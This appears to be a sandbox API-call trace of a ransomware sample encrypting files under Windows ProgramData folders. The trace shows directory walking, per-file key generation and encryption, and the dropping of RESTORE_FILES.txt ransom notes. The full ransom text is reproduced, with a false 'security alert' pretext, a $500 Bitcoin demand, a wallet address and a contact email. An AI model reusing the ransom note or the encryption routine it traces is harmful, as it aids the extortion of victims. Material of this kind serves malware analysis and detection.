[0065.509] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.509] CloseHandle (hObject=0xa4) returned 1 [0065.509] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0065.509] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned 35 [0065.509] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0065.509] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0065.509] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*") returned 37 [0065.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0065.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.510] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.510] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.510] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\.") returned 37 [0065.511] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.511] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.511] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0065.511] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.511] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.511] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.511] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.511] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\..") returned 38 [0065.511] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.511] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.511] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="Windows") returned -1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="Program Files") returned -1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="Program Files (x86)") returned -1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="$Recycle.bin") returned 1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="System Volume Information") returned -1 [0065.511] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned 39 [0065.511] lstrcmpW (lpString1="DSS", lpString2=".") returned 1 [0065.511] lstrcmpW (lpString1="DSS", lpString2="..") returned 1 [0065.511] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*") returned 41 [0065.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.511] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.511] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.511] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.511] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.511] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.511] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\.") returned 41 [0065.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.512] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.512] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.512] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.512] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.512] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.512] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.512] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\..") returned 42 [0065.512] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.512] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0065.512] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0065.512] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0065.512] lstrcmpW (lpString1="MachineKeys", 
lpString2="..") returned 1 [0065.512] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned 53 [0065.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.512] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.512] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.512] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.512] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.512] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.512] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\.") returned 53 [0065.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.512] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.513] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.513] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.514] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.514] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.514] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.514] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\..") returned 54 [0065.514] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.514] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.514] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.514] FindClose (in: hFindFile=0x447cc0 | out: 
hFindFile=0x447cc0) returned 1 [0065.514] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt") returned 69 [0065.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.515] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.515] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.516] lstrlenA (lpString="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") returned 684 [0065.516] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.516] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.516] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.516] CloseHandle (hObject=0xd4) returned 1 [0065.516] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.516] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.516] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt") returned 57 [0065.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.516] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.516] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.517] lstrlenA (lpString="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") returned 684 [0065.517] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.517] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.517] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.517] CloseHandle (hObject=0xb4) returned 1 [0065.517] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.517] lstrcmpiW (lpString1="Keys", lpString2="Windows") returned -1 [0065.517] lstrcmpiW (lpString1="Keys", lpString2="Program Files") returned -1 [0065.517] lstrcmpiW (lpString1="Keys", lpString2="Program Files (x86)") returned -1 [0065.518] lstrcmpiW (lpString1="Keys", lpString2="$Recycle.bin") returned 1 [0065.518] lstrcmpiW (lpString1="Keys", lpString2="System Volume Information") returned -1 [0065.519] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned 40 [0065.519] lstrcmpW (lpString1="Keys", lpString2=".") returned 1 [0065.519] lstrcmpW (lpString1="Keys", lpString2="..") returned 1 [0065.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*") returned 42 [0065.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.519] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.519] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.") returned 42 [0065.520] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.520] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0065.520] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0065.520] CryptGenRandom 
(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0065.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0065.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.520] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.520] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.520] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.520] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.520] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\..") returned 43 [0065.520] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.520] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0065.520] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0065.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0065.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0065.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.." 
(normalized: "c:\\programdata\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.520] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt") returned 58 [0065.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.521] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.521] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.523] lstrlenA (lpString="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") returned 684 [0065.523] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.523] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.523] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.523] CloseHandle (hObject=0xb4) returned 1 [0065.523] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0065.523] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned 39 [0065.523] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0065.523] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0065.523] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*") returned 41 [0065.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.524] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.524] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\.") returned 41 [0065.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.524] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.524] lstrcmpiW (lpString1="..", lpString2="Windows") returned 
-1 [0065.524] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.524] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\..") returned 42 [0065.524] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.524] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.524] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0065.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0065.524] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0065.524] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0065.524] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned 53 [0065.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.524] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.525] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\.") returned 53 [0065.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.525] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.525] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\..") returned 54 [0065.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.525] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.525] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.526] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt") returned 69 [0065.526] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\restore_files.txt"), 